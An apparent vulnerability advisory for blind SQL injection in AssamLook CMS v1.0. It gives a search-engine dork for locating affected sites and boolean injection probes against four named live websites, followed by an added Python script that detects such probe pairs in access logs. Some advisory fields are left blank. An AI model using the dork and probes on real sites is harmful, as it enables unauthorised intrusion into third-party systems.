Key Information

Vulnerability Overview
Vulnerability type: Blind SQL Injection
Affected software: AssamLook CMS v1.0
Vendor: https://assamlook.com/
Google Dork: intext:"Powered By Assamlook.com"
Category: Web application
Tested on: Windows, Firefox

Vulnerable Parameters
Vulnerable parameter: or
URL examples:
-
-

Description
AssamLook CMS is vulnerable to blind SQL injection on the following pages:

Examples
Demo 1:
- https://rhinoprintopacks.com/product.php?id=53' and 1=1--
- https://rhinoprintopacks.com/product.php?id=53' and 1=2--

Demo 2:
- https://www.nonolcollege.in/department-profile.php?did=1' and 1=1--
- https://www.nonolcollege.in/department-profile.php?did=1' and 1=2--

Demo 3:
- https://rahacollege.co.in/department-profile.php?did=3' and 1=1--
- https://rahacollege.co.in/department-profile.php?did=3' and 1=2--

Demo 4:
- https://www.ludingcollege.org/view_tender.php?id=108' and 1=1--
- https://www.ludingcollege.org/view_tender.php?id=108' and 1=2--
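
The demo requests come in pairs: the same parameter is sent once with an always-true comparison (`' and 1=1--`) and once with an always-false one (`' and 1=2--`), and such pairs are visible in web server access logs. The following Python script is an added example, not part of the original advisory, that flags these pairs per client and parameter. The log lines, client addresses and the function name `find_boolean_probe_pairs` are constructed for illustration, and a combined-log-format access log is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /product.php?id=53 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /product.php?id=53%27%20and%201=1--%20 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /product.php?id=53%27%20and%201=2--%20 HTTP/1.1" 200 1033
192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
# A quote break-out followed by a numeric comparison, e.g. 53' and 1=1
PROBE_RE = re.compile(r"""^(.*?)['"]\s*(?:and|or)\s+(\d+)\s*=\s*(\d+)""", re.I | re.S)

def find_boolean_probe_pairs(log_text):
    """Return findings where one client sent both an always-true and an
    always-false comparison to the same path, parameter and base value."""
    seen = defaultdict(lambda: {True: [], False: []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        # parse_qsl URL-decodes values, so %27 becomes ' before matching
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            p = PROBE_RE.match(value)
            if p:
                truth = p.group(2) == p.group(3)   # 1=1 -> True, 1=2 -> False
                key = (client, url.path, name, p.group(1))
                seen[key][truth].append(0 if size == "-" else int(size))
    findings = []
    for (client, path, name, base), sizes in seen.items():
        if sizes[True] and sizes[False]:
            # "oracle": response sizes differ between the true and false probes,
            # i.e. the page answered the boolean question and needs priority review.
            findings.append({"client": client, "path": path, "param": name, "base": base,
                             "oracle": set(sizes[True]).isdisjoint(sizes[False])})
    return findings

if __name__ == "__main__":
    for finding in find_boolean_probe_pairs(SAMPLE_LOG):
        print(finding)
```

A finding with `oracle` set to true means the response size changed with the injected condition, which is the behavior that parameterized queries on the affected parameter remove.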